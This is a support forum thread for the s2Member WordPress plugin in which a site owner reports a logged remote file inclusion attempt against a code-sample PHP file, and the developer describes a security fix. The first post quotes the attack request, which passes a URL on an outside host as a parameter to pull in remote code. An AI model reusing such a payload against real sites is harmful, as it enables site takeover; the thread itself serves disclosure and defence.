Community Support Forums

[coloradoflyfisherman]

9/27/11 today a hacker named genshop.org tried and succeeded in accessing this page

plugins/s2member/includes/menu-pages/code-samples/current-user-login.php?varname=http://genshop.org/script/prostoparanoia/ras HTTP/1.1" 200 397 getting a 200 return which is a successful access. If I did not have security software in operation, this hacker would have hacked me again.

I know there is not much code on the page accessed but what an obscure place to bury a hacker code to do a site name hijack and add pages to Google index.

[Cristián Lávaque]

I'm letting Jason know about this just in case. Thanks for reporting it.

[Jason Caldwell]

Thanks for reporting this important issue.
~ I'm having this addressed in the next release.

* (s2Member) **Security fix**. It was possible for some of s2Member's code sample files to be executed directly. Not a proven vulnerability, but definitely NOT a good idea to allow this either. Fixed in this release, by renaming all `.php` files inside the `/includes/menu-pages/code-samples/` directory. These files now have a `.x-php` extension. As an additional line of defense, a new `.htaccess` file with `deny from all` is automatically placed inside the main `/s2member/includes/` directory. None of these files should be available pulicly anyway. s2Member's exsiting `realpath()` file scans remain in place too, which further prevents the direct execution of `.php` files.

[Deyson]

Can we have the name of the security program that was used to discover this?